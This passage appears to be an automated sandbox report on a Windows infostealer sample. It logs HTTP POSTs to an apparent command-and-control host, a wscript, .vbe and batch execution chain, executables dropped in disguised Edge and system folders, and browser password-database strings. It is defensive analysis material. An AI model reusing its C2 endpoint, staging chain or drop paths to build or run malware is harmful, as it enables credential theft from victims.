                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2644Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2192Expect: 100-continue
                                    Source: global traffic | HTTP traffic detected: POST /provider_cpugame.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36 | Host: 703648cm.renyash.top | Content-Length: 2204 | Expect: 100-continue
                                    Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
                                    Source: global traffic | DNS traffic detected: DNS query: 703648cm.renyash.top
                                    Source: unknown | HTTP traffic detected: POST /provider_cpugame.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36 | Host: 703648cm.renyash.top | Content-Length: 344 | Expect: 100-continue | Connection: Keep-Alive
                                    Source: yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2956805434.00000000031AA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://703648cm.reP
                                    Source: yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2956805434.00000000031AA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://703648cm.renyash.top
                                    Source: yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2956805434.0000000002C3F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://703648cm.renyash.top/
                                    Source: yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2956805434.0000000002D83000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2956805434.0000000002C3F000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2956805434.00000000031AA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://703648cm.renyash.top/provider_cpugame.php
                                    Source: yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2956805434.0000000002C3F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://703648cm.renyash.top/provider_cpugame.phpp
                                    Source: ChainFontruntimeCrt.exe, 00000004.00000002.1754509420.0000000002E29000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2956805434.0000000002C3F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
00000009.00000002.2966939743.0000000013B50000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.00000000135AE000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000012EBF000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013228000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013C81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                                    Source: yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.00000000140D4000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.00000000137AF000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013D19000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.00000000141E6000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.000000001403C000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013717000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.00000000139E8000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.00000000134DE000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013D6B000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013190000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013027000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.000000001387F000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013446000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013F6B000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013ED3000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013918000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 
00000009.00000002.2966939743.0000000013B50000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.00000000135AE000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000012EBF000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013228000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013C81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                                    Source: yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.00000000140D4000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.00000000137AF000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013D19000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.00000000141E6000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.000000001403C000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013717000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.00000000139E8000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.00000000134DE000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013D6B000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013190000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013027000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.000000001387F000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013446000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013F6B000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013ED3000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013918000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 
00000009.00000002.2966939743.0000000013B50000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.00000000135AE000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000012EBF000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013228000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013C81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                                    Source: yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.00000000140D4000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.00000000137AF000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013D19000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.00000000141E6000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.000000001403C000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013717000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.00000000139E8000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.00000000134DE000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013D6B000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013190000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013027000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.000000001387F000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013446000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013F6B000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013ED3000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013918000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 
00000009.00000002.2966939743.0000000013B50000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.00000000135AE000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000012EBF000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013228000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013C81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe Window created: window name: CLIPBRDWNDCLASS

                                    System Summary

                                    Source: C:\Windows\SysWOW64\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe Process Stats: CPU usage > 49%
                                    Source: C:\Users\user\Desktop\8k1e14tjcx.exe Code function: 0_2_00E96FAA: __EH_prolog,_wcslen,_wcslen,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,0_2_00E96FAA
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exe File created: C:\Windows\AppReadiness\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exe File created: C:\Windows\AppReadiness\db08104604e511
                                    Source: C:\Users\user\Desktop\8k1e14tjcx.exe Code function: String function: 00EAEB78 appears 39 times
                                    Source: C:\Users\user\Desktop\8k1e14tjcx.exe Code function: String function: 00EAEC50 appears 56 times
                                    Source: C:\Users\user\Desktop\8k1e14tjcx.exe Code function: String function: 00EAF5F0 appears 31 times
                                    Source: 8k1e14tjcx.exe, 00000000.00000003.1701368630.000000000342C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamewscript.exe` vs 8k1e14tjcx.exe
                                    Source: 8k1e14tjcx.exe Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs 8k1e14tjcx.exe
                                    Source: 8k1e14tjcx.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                    Source: ChainFontruntimeCrt.exe.0.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: yeeQesPXxpnDuwPWqTnUoVbi.exe.4.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: yeeQesPXxpnDuwPWqTnUoVbi.exe0.4.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: OfficeClickToRun.exe.4.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: yeeQesPXxpnDuwPWqTnUoVbi.exe1.4.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: yeeQesPXxpnDuwPWqTnUoVbi.exe2.4.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@18/267@1/1
                                    Source: C:\Users\user\Desktop\8k1e14tjcx.exe Code function: 0_2_00E96C74 GetLastError,FormatMessageW,0_2_00E96C74
                                    Source: C:\Users\user\Desktop\8k1e14tjcx.exe Code function: 0_2_00EAA6C2 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,0_2_00EAA6C2
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exe File created: C:\Program Files (x86)\microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exe File created: C:\Users\user\Desktop\HZSnKfqJ.log
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe Mutant created: NULL
                                    Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7524:120:WilError_03
                                    Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7368:120:WilError_03
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\DCR_MUTEX-7QSmDzANvDkQAgXpPhWh
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exe File created: C:\Users\user\AppData\Local\Temp\yHMm05yQcL
                                    Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ChainagentComponent\q14QT1c6LK4xpgG0MrqndXYweJYHdEecuYXEv1hUkMNQcqj9DhhAaajtNw.bat" "
                                    Source: C:\Users\user\Desktop\8k1e14tjcx.exe Command line argument: sfxname, 0_2_00EADF1E
                                    Source: C:\Users\user\Desktop\8k1e14tjcx.exe Command line argument: sfxstime, 0_2_00EADF1E
                                    Source: C:\Users\user\Desktop\8k1e14tjcx.exe Command line argument: STARTDLG, 0_2_00EADF1E
                                    Source: C:\Users\user\Desktop\8k1e14tjcx.exe Command line argument: xz, 0_2_00EADF1E
                                    Source: 8k1e14tjcx.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: 8k1e14tjcx.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                                    Source: C:\Users\user\Desktop\8k1e14tjcx.exe File read: C:\Windows\win.ini
                                    Source: C:\Users\user\Desktop\8k1e14tjcx.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                                    Source: Jy8UMgCbf3.9.dr, iQ07yOc3Yu.9.dr, l5Un2quyrK.9.dr, CljGS0qeQ1.9.dr, 9Eu6lHwjMM.9.dr, Duj9YBd7aa.9.dr, 6osabqjFQK.9.dr, Z13stlPtuJ.9.dr, 36ockHqNHS.9.dr, MRX210yq0f.9.dr, pyj91tC4RS.9.dr, o2cUFO2Ccr.9.dr, RRnEXNYsau.9.dr, FItRauZ3Tr.9.dr, nSeo4ql17G.9.dr, jZOQDTUZUv.9.dr, 0RYwgN508w.9.dr, yi6b1ILNg4.9.dr, VYB0a4uwNC.9.dr, Yjc776KY3F.9.dr, z5cBLlsr95.9.dr, GBxiYBd1uh.9.dr, umFMX3ei74.9.dr, 1I5Wrg3tLj.9.dr, EwWRb1qlu8.9.dr, s8qJR17h0m.9.dr, sbWv71Pmx6.9.dr, IKln6QMVEN.9.dr, NOlYAWesyP.9.dr, cicIpTSZHK.9.dr, QyiKhqXDJh.9.dr, LSFlfqGJR1.9.dr, 9ijuX1eNzG.9.dr, VIQd9S20Vy.9.dr, adLqhOmmDp.9.dr, aNtUO1yRIY.9.dr, rQtHfgKFml.9.dr, oomjhqf1ph.9.dr, UcjWfYLwTs.9.dr, FQWVwwugbs.9.dr, bUK1sJKGeT.9.dr, X1ITOcCAlk.9.dr, 9DoZZDrbEC.9.dr, Nvt7Bvr3kj.9.dr, tuNpGwk1kM.9.dr, ItC6u6iT7A.9.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                                    Source: 8k1e14tjcx.exe ReversingLabs: Detection: 65%
                                    Source: C:\Users\user\Desktop\8k1e14tjcx.exe File read: C:\Users\user\Desktop\8k1e14tjcx.exe
                                    Source: unknown Process created: C:\Users\user\Desktop\8k1e14tjcx.exe "C:\Users\user\Desktop\8k1e14tjcx.exe"
                                    Source: C:\Users\user\Desktop\8k1e14tjcx.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ChainagentComponent\PWC9d9T0TgxIE17d8kEvKaBzSy5sS4bSkqUfKmaENJQQSQ4ECN.vbe"
                                    Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ChainagentComponent\q14QT1c6LK4xpgG0MrqndXYweJYHdEecuYXEv1hUkMNQcqj9DhhAaajtNw.bat" "
                                    Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\ChainagentComponent\ChainFontruntimeCrt.exe "C:\ChainagentComponent/ChainFontruntimeCrt.exe"
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\KC0FFSqemJ.bat"
                                    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
                                    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                    Source: C:\Windows\System32\cmd.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe "C:\Program Files (x86)\microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe"
                                    Source: C:\Users\user\Desktop\8k1e14tjcx.exe Section loaded: <pi-ms-win-core-synch-l1-2-0.dll
                                    Source: C:\Users\user\Desktop\8k1e14tjcx.exe Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll
                                    Source: C:\Users\user\Desktop\8k1e14tjcx.exe Section loaded: <pi-ms-win-core-localization-l1-2-1.dll
                                    Source: C:\Users\user\Desktop\8k1e14tjcx.exe Section loaded: version.dll
                                    Source: C:\Users\user\Desktop\8k1e14tjcx.exe Section loaded: dxgidebug.dll
                                    Source: C:\Users\user\Desktop\8k1e14tjcx.exe Section loaded: sfc_os.dll
                                    Source: C:\Users\user\Desktop\8k1e14tjcx.exe Section loaded: sspicli.dll
                                    Source: C:\Users\user\Desktop\8k1e14tjcx.exe Section loaded: rsaenh.dll
                                    Source: C:\Users\user\Desktop\8k1e14tjcx.exe Section loaded: uxtheme.dll
                                    Source: C:\Users\user\Desktop\8k1e14tjcx.exe Section loaded: dwmapi.dll
                                    Source: C:\Users\user\Desktop\8k1e14tjcx.exe Section loaded: cryptbase.dll
                                    Source: C:\Users\user\Desktop\8k1e14tjcx.exe Section loaded: riched20.dll
                                    Source: C:\Users\user\Desktop\8k1e14tjcx.exe Section loaded: usp10.dll
                                    Source: C:\Users\user\Desktop\8k1e14tjcx.exe Section loaded: msls31.dll
                                    Source: C:\Users\user\Desktop\8k1e14tjcx.exe Section loaded: kernel.appcore.dll
                                    Source: C:\Users\user\Desktop\8k1e14tjcx.exe Section loaded: windowscodecs.dll
                                    Source: C:\Users\user\Desktop\8k1e14tjcx.exe Section loaded: textshaping.dll
                                    Source: C:\Users\user\Desktop\8k1e14tjcx.exe Section loaded: textinputframework.dll
                                    Source: C:\Users\user\Desktop\8k1e14tjcx.exe Section loaded: coreuicomponents.dll
                                    Source: C:\Users\user\Desktop\8k1e14tjcx.exe Section loaded: coremessaging.dll
                                    Source: C:\Users\user\Desktop\8k1e14tjcx.exe Section loaded: ntmarta.dll
                                    Source: C:\Users\user\Desktop\8k1e14tjcx.exe Section loaded: wintypes.dll
                                    Source: C:\Users\user\Desktop\8k1e14tjcx.exe Section loaded: windows.storage.dll
                                    Source: C:\Users\user\Desktop\8k1e14tjcx.exe Section loaded: wldp.dll
                                    Source: C:\Users\user\Desktop\8k1e14tjcx.exe Section loaded: propsys.dll
                                    Source: C:\Users\user\Desktop\8k1e14tjcx.exe Section loaded: profapi.dll
                                    Source: C:\Users\user\Desktop\8k1e14tjcx.exe Section loaded: edputil.dll
                                    Source: C:\Users\user\Desktop\8k1e14tjcx.exe Section loaded: urlmon.dll
                                    Source: C:\Users\user\Desktop\8k1e14tjcx.exe Section loaded: iertutil.dll
                                    Source: C:\Users\user\Desktop\8k1e14tjcx.exe Section loaded: srvcli.dll
                                    Source: C:\Users\user\Desktop\8k1e14tjcx.exe Section loaded: netutils.dll
                                    Source: C:\Users\user\Desktop\8k1e14tjcx.exe Section loaded: windows.staterepositoryps.dll
                                    Source: C:\Users\user\Desktop\8k1e14tjcx.exe Section loaded: policymanager.dll
                                    Source: C:\Users\user\Desktop\8k1e14tjcx.exe Section loaded: msvcp110_win.dll
                                    Source: C:\Users\user\Desktop\8k1e14tjcx.exe Section loaded: appresolver.dll
                                    Source: C:\Users\user\Desktop\8k1e14tjcx.exe Section loaded: bcp47langs.dll
                                    Source: C:\Users\user\Desktop\8k1e14tjcx.exe Section loaded: slc.dll
                                    Source: C:\Users\user\Desktop\8k1e14tjcx.exe Section loaded: sppc.dll
                                    Source: C:\Users\user\Desktop\8k1e14tjcx.exe Section loaded: userenv.dll
                                    Source: C:\Users\user\Desktop\8k1e14tjcx.exe Section loaded: onecorecommonproxystub.dll
                                    Source: C:\Users\user\Desktop\8k1e14tjcx.exe Section loaded: onecoreuapcommonproxystub.dll
                                    Source: C:\Users\user\Desktop\8k1e14tjcx.exe Section loaded: pcacli.dll
                                    Source: C:\Users\user\Desktop\8k1e14tjcx.exe Section loaded: mpr.dll
                                    Source: C:\Windows\SysWOW64\wscript.exe Section loaded: version.dll
                                    Source: C:\Windows\SysWOW64\wscript.exe Section loaded: kernel.appcore.dll
                                    Source: C:\Windows\SysWOW64\wscript.exe Section loaded: uxtheme.dll
                                    Source: C:\Windows\SysWOW64\wscript.exe Section loaded: sxs.dll
                                    Source: C:\Windows\SysWOW64\wscript.exe Section loaded: vbscript.dll
                                    Source: C:\Windows\SysWOW64\wscript.exe Section loaded: amsi.dll
                                    Source: C:\Windows\SysWOW64\wscript.exe Section loaded: userenv.dll
                                    Source: C:\Windows\SysWOW64\wscript.exe Section loaded: profapi.dll
                                    Source: C:\Windows\SysWOW64\wscript.exe Section loaded: wldp.dll
                                    Source: C:\Windows\SysWOW64\wscript.exe Section loaded: msasn1.dll
                                    Source: C:\Windows\SysWOW64\wscript.exe Section loaded: cryptsp.dll
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: apphelp.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dlnashext.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wpdshext.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dllJump to behavior
